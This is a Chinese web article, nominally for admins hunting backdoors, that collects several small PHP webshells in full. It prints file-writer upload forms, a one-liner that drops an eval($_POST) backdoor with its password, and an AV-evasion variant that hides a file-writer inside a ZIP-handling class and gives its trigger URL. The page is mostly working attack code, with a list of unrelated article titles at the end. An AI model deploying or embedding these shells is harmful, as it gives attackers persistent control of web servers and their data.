超小PHP小马小结(方便查找后门的朋友)
2015-01-24信息快讯网
超小PHP小马小结,方便查找后门的朋友,发现相关类似代码可以直接封杀了
作者: spider我也来个超小PHP小马
<?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); ?> <form method="POST"> 保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> <br><br> <textarea name="text" COLS="70" ROWS="18" ></textarea> <br><br> <input type="submit" name="submit" value="保存"> <form> <?php if(isset($_POST['file'])) { $fp = @fopen($_POST['file'],'wb'); echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; @fclose($fp); } ?>
昨晚无聊看了会 php 的教程,发现php真是相当的强大啊!顺便写了个php小马
下面直接贴代码了。。
<html> <title >By: SinCoder</title> <font color=red size=6>php小马 By:SinCoder</br></font> <? echo "</br>本程序的路径: ".__FILE__. "</br>服务器操作系统: ".PHP_OS. "</br>服务器IP地址: ".gethostbyname($_SERVER["SERVER_NAME"]). "</br>PHP版本: ".PHP_VERSION; ?> <form action = <? echo strrchr(__FILE__,"\\"); ?> method="post"> 要提交的数据:</br> <textarea type="text" name="data" rows="10" cols="30"> </textarea> </br> 保存路径:<input type="text" name="dir" /> </br> <input type="submit" value="提交"/> </form> </html> <? if(!(isset($_POST["data"]) && isset($_POST["dir"]))) exit(); if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) { $p_File=fopen($_POST["dir"],"a"); if(!$p_File) echo "写入失败!请换个目录试试!"; else echo "Ok!! "; fputs($p_File,$_POST["data"]); fclose($p_File); } else echo "请把数据填写完整!"; ?>
php一句话小马的后门
<?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?>
这样访问之后,在当前目录生成jb51.php 内容为 <?eval($_POST[jb51]);?>)?> 的一句话小马,密码为 jb51
最新免杀php小马
<?php class zip { var $datasec, $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; var $dirs = Array("."); function get_List($zip_name) { $ret = ''; $zip = @fopen($zip_name, 'rb'); if(!$zip) return(0); $centd = $this->ReadCentralDir($zip,$zip_name); @rewind($zip); @fseek($zip, $centd['offset']); for ($i=0; $i<$centd['entries']; $i++) { $header = $this->ReadCentralFileHeaders($zip); $header['index'] = $i;$info['filename'] = $header['filename']; $info['stored_filename'] = $header['stored_filename']; $info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; $info['crc'] = strtoupper(dechex( $header['crc'] )); $info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; $info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; $info['index'] = $header['index'];$info['status'] = $header['status']; $ret[]=$info; unset($header); } return $ret; } function Add($files,$compact) { if(!is_array($files[0])) $files=Array($files); for($i=0;$files[$i];$i++){ $fn = $files[$i]; if(!in_Array(dirname($fn[0]),$this->dirs)) $this->add_Dir(dirname($fn[0])); if(basename($fn[0])) $ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); } return $ret; } function get_file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } function add_dir($name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); $fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); $cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; $this -> ctrl_dir[] = $cdrec; $this -> old_offset = $new_offset; $this -> dirs[] = $name; } function add_File($data, $name, $compact = 1) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->DosTime()); $hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); if($compact) $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; $unc_len = strlen($data); $crc = crc32($data); if($compact){ $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); }else{ $zdata = $data; } $c_len=strlen($zdata); $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); if($compact) $cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; $cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); $cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; return true; } function DosTime() { $timearray = getdate(); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } //解压整个压缩包 //直接用 Extract 会有路径问题,本函数先从列表中获得文件信息并创建好所有目录然后才运行 Extract function ExtractAll ( $zn, $to) { if(substr($to,-1)!="/") $to .= "/"; $files = $this->get_List($zn); $cn = count($files); if(is_array($files)) { for($i=0;$i<$cn;$i++) { if($files[$i]['folder']==1){ @mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); @chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); } } } $this->Extract ($zn,$to); } function Extract ( $zn, $to, $index = Array(-1) ) { $ok = 0; $zip = @fopen($zn,'rb'); if(!$zip) return(-1); $cdir = $this->ReadCentralDir($zip,$zn); $pos_entry = $cdir['offset']; if(!is_array($index)){ $index = array($index); } for($i=0; isset($index[$i]);$i++){ if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) return(-1); } for ($i=0; $i<$cdir['entries']; $i++) { @fseek($zip, $pos_entry); $header = $this->ReadCentralFileHeaders($zip); $header['index'] = $i; $pos_entry = ftell($zip); @rewind($zip); fseek($zip, $header['offset']); if(in_array("-1",$index)||in_array($i,$index)) $stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); } fclose($zip); return $stat; } function ReadFileHeader($zip) { $binary_data = fread($zip, 30); $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); $header['filename'] = fread($zip, $data['filename_len']); if ($data['extra_len'] != 0) { $header['extra'] = fread($zip, $data['extra_len']); } else { $header['extra'] = ''; } $header['compression'] = $data['compression'];$header['size'] = $data['size']; $header['compressed_size'] = $data['compressed_size']; $header['crc'] = $data['crc']; $header['flag'] = $data['flag']; $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; if ($header['mdate'] && $header['mtime']){ $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); }else{$header['mtime'] = time();} $header['stored_filename'] = $header['filename']; $header['status'] = "ok"; return $header; } function ReadCentralFileHeaders($zip){ $binary_data = fread($zip, 46); $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); if ($header['filename_len'] != 0) $header['filename'] = fread($zip,$header['filename_len']); else $header['filename'] = ''; if ($header['extra_len'] != 0) $header['extra'] = fread($zip, $header['extra_len']); else $header['extra'] = ''; if ($header['comment_len'] != 0) $header['comment'] = fread($zip, $header['comment_len']); else $header['comment'] = ''; if ($header['mdate'] && $header['mtime']) { $hour = ($header['mtime'] & 0xF800) >> 11; $minute = ($header['mtime'] & 0x07E0) >> 5; $seconde = ($header['mtime'] & 0x001F)*2; $year = (($header['mdate'] & 0xFE00) >> 9) + 1980; $month = ($header['mdate'] & 0x01E0) >> 5; $day = $header['mdate'] & 0x001F; $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); } else { $header['mtime'] = time(); } $header['stored_filename'] = $header['filename']; $header['status'] = 'ok'; if (substr($header['filename'], -1) == '/') $header['external'] = 0x41FF0010; return $header; } function ReadCentralDir($zip,$zip_name) { $size = filesize($zip_name); if ($size < 277) $maximum_size = $size; else $maximum_size=277; @fseek($zip, $size-$maximum_size); $pos = ftell($zip); $bytes = 0x00000000; while ($pos < $size) { $byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); if ($bytes == 0x504b0506){ $pos++; break; } $pos++; } $data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); else $centd['comment'] = ''; $centd['entries'] = $data['entries']; $centd['disk_entries'] = $data['disk_entries']; $centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; $centd['size'] = $data['size']; $centd['disk'] = $data['disk']; return $centd; } function ExtractFile($header,$to,$zip) { $header = $this->readfileheader($zip); $header['external'] = (!isset($header['external']) ? 0 : $header['external']); if(substr($to,-1)!="/") $to.="/"; if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); if (!($header['external']==0x41FF0010)&&!($header['external']==16)) { if ($header['compression']==0) { $fp = @fopen($to.$header['filename'], 'wb'); if(!$fp) return(-1); $size = $header['compressed_size']; while ($size != 0) { $read_size = ($size < 2048 ? $size : 2048); $buffer = fread($zip, $read_size); $binary_data = pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } fclose($fp); touch($to.$header['filename'], $header['mtime']); }else{ $fp = @fopen($to.$header['filename'].'.gz','wb'); if(!$fp) return(-1); $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), Chr(0x00), time(), Chr(0x00), Chr(3)); fwrite($fp, $binary_data, 10); $size = $header['compressed_size']; while ($size != 0) { $read_size = ($size < 1024 ? $size : 1024); $buffer = fread($zip, $read_size); $binary_data = pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } $binary_data = pack('VV', $header['crc'], $header['size']); fwrite($fp, $binary_data,8); fclose($fp); $gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); if(!$gzp) return(-2); $fp = @fopen($to.$header['filename'],'wb'); if(!$fp) return(-1); $size = $header['size']; while ($size != 0) { $read_size = ($size < 2048 ? $size : 2048); $buffer = gzread($gzp, $read_size); $binary_data = pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } fclose($fp); gzclose($gzp); touch($to.$header['filename'], $header['mtime']); @unlink($to.$header['filename'].'.gz'); }} return true; } } if($_GET['zxzgcn']=='login'){ header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); ?> <form method="POST"> save to: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> <br><br> <textarea name="text" COLS="70" ROWS="18" ></textarea> <br><br> <input type="submit" name="submit" value="save"> <form> <?php if(isset($_POST['file'])) { $fp = @fopen($_POST['file'],'wb'); echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; @fclose($fp); } } ?>
用法xxx.php?zxzgcn=login
php后门URL的防范
慎用preg_replace危险的/e修饰符(一句话后门常用)
解析:使用php mongodb扩展时 需要注意的事项
解析:通过php socket并借助telnet实现简单的聊天程序
浅析is_writable的php实现
ubuntu下编译安装xcache for php5.3 的具体操作步骤
编译php 5.2.14+fpm+memcached(具体操作详解)
php在线代理转向代码
apache mysql php 源码编译使用方法
几个有用的php字符串过滤,转换函数代码
PHP 基于文件头的文件类型验证类函数
PHP 第三节 变量介绍
PHP 第二节 数据类型之转换
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
DEDE采集大师官方留后门的删除办法
在最好的季节 逛逛沪上10条不过一公里的小马路